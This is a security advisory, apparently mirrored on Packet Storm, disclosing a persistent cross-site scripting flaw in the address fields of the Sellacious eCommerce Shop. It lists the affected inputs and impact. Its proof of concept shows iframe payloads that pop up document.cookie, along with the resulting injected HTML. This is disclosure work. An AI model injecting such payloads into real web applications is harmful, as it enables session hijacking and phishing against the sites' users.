what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Sellacious eCommerce Shop Cross Site Scripting

Sellacious eCommerce Shop Cross Site Scripting
Posted May 13, 2020
Authored by Benjamin Kunz Mejri, Vulnerability Laboratory | Site vulnerability-lab.com

Sellacious eCommerce Shop suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 196ab4b61f5e94a2f03aa875f07eba9b1953c199d6022d1281f851d7e3335a34

Sellacious eCommerce Shop Cross Site Scripting

Change Mirror Download
Document Title:
===============
Sellacious eCommerce - Multiple Persistent Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2226


Release Date:
=============
2020-05-08


Vulnerability Laboratory ID (VL-ID):
====================================
2226


Common Vulnerability Scoring System:
====================================
4.6


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
Sellacious is a perfect solution for all your b2b needs, coded and built
to render all user groups, Be it Small, Medium or Enterprise.
Sellacious is fixed with all the features required for a b2b online
store making it a model b2b eCommerce software. Unlike other
solutions, requires extremely less plugins to make it a complete
solution which defines it as a fit Enterprise eCommerce Software.
Sellacious is designed to render the users an interface which supports
the running of your first Online store or Joomla Marketplace
under 2 minutes. Be it a store with just a fraction of products or with
thousands of variations, Sellacious - an extremely dependable
eCommerce marketplace software is delivered to handle them all with just
a few clicks.

(Copy of the Homepage:
https://www.sellacious.com/free-open-source-ecommerce-software )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
persistent web vulnerabilities in the Sellacious eCommerce Shop CMS.


Vulnerability Disclosure Timeline:
==================================
2020-05-08: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in
the official Sellacious eCommerce Shop CMS (2020 Q1).
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise
browser to web-application requests from the application-side.

The cross site web vulnerabilities are located in the all the adress
input fields of the `Manage Your Addresses` module.
Remote attackers are able to register a low privilege user account to
inject own malicious script code to the adress
information page. The execution of the script code occurs each time the
adress information is used in the web ui of
the ecommerce application. The request method to inject is POST and the
attack vector is persistent on the application-side.

Successful exploitation of the vulnerabilities results in session
hijacking, persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation of
affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Manage Your Addresses

Vulnerable Input(s):
[+] Full name
[+] First name
[+] Middle name
[+] Last name
[+] Company
[+] PO Box
[+] Address
[+] Landmark

Affected(s):
[+] index.php/manage-your-addresses
[+] Backend user adress information listing


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by
remote attackers with user account and low user interaction.
For security demonstration or to reproduce the web vulnerability follow
the provided information and steps below to continue.


PoC: Exploitation
<iframe src="evil.source" onload=alert(document.cookie)>
<iframe src="evil.source" onload=alert(document.domain)>


PoC: Vulnerable Source
<div class="addresses-container">
<div class="address-heading">
<h2>Your addresses
<a href="#address-form-0" role="button" data-toggle="ctech-modal"
class="ctech-mb-3 btn-add-address ctech-float-right ctech-text-primary">
<i class="fa fa-plus"></i> <span class="add-address-text">Add New
Address</span></a></h2></div>
<div id="addresses" class="cart-aio ctech-text-center">
<div id="address-editor">
<ul id="address-items" data-original-title="" title=""> <li
class="address-item" id="address-item-9"> <div class="ctech-float-right
address-action">
<button type="button" class="ctech-btn ctech-btn-small ctech-btn-default
hasTooltip remove-address" data-placement="bottom" data-id="9" title=""
data-original-title="Delete"><i class="fa fa-trash-alt"></i></button> <a
href="#address-form-9" role="button" data-toggle="ctech-modal"
data-placement="bottom"
class="ctech-btn ctech-btn-small ctech-btn-default hasTooltip" title=""
data-original-title="Edit"><i class="fa fa-edit"></i></a> </div>
<div class="address-content"> <span class="address_name">>"<iframe
src="evil.source"></span> <span class="address_company">>"<iframe
src="evil.source"></span>
<span class="address_po_box">PO #: >"<iframe src="evil.source"></span>
<span class="address_address has-comma">>"<iframe src="evil.source"></span>
<span class="address_landmark has-comma">>"<iframe
src="evil.source"></span> <span class="address_country">United
States</span>
<div class="cart_address_box w100p"> <div class="cart_address_buttons">
</div> </div> </div> </li> <li class="address-item odd-address-item">
<a href="#address-form-0" role="button" data-toggle="ctech-modal"
class="btn-new-address"><i class="fa fa-plus"></i></a> </li>
</iframe></span></div></li></ul>
<div class="ctech-wrapper">
</div><div class="ctech-clearfix"></div>
</div><div class="ctech-clearfix"></div>
</div></div>


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™




--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close